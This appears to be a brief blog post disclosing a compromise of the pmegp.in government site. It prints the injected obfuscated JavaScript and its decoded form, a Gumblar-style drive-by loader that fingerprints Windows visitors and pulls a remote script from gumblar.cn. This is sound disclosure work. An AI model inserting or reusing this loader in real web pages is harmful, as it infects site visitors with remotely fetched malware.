Following site
pmegp.in/ - Prime Minister's Employment Generation Programme
have been attacked and following malicious script was inserted.
1: 2: (function(){var cVrd='%';var Fvm=unescape(('&76ar&20a&3d&22ScriptE&6egine&22&2cb&3d&22Vers&69on() +&22&2c&6a&3d&22&22&2c&75&3dnav&69g&61t&6fr&2e&75ser&41&67ent&3bif&28(&75&2eind&65xO&66(&22Win&22)&3e&30&29&26&26 (u&2ein&64&65&78&4ff(&22&4e&54&20&36&22)&3c0&29&26&26&28docume&6et&2eco&6fk&69e&2e&69n&64exOf(&22m&69ek&3d&31&22) &3c&30&29&26&26(typeof(zrvzts)&21&3dtyp&65of(&22A&22)))&7bzrvz&74s&3d&22A&22&3beva&6c&28&22if (win&64&6fw&2e&22+a+&22) j&3dj+&22&2ba&2b&22M&61jor&22&2bb&2ba&2b&22&4d&69n&6fr&22+b+&61+&22&42uild&22+b+&22&6a&3b&22) &3bdocum&65n&74&2ewrite (&22&3cscri&70&74&20s&72c&3d&2f&2fg&75&6dblar&2ecn&2frss&2f&3f&69d&3d&22&2bj+&22&3e&3c&5c&2fscrip&74&3e&22&29&3b&7d' ).replace(/&/g,cVrd));eval(Fvm)})();
This is Decrypted to
1: var a="ScriptEngine",b="Version()+",j="",u=navigator.userAgent;if((u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&& (document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A"))){zrvzts="A";eval("if(window."+a+") j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");document.write("<script src=//gumblar.cn/rss/? id="+j+"><\/script>");}
this is redirects to cn site here is the report on same.
http://www.google.com/safebrowsing/diagnostic?site=gumblar.cn
No comments:
Post a Comment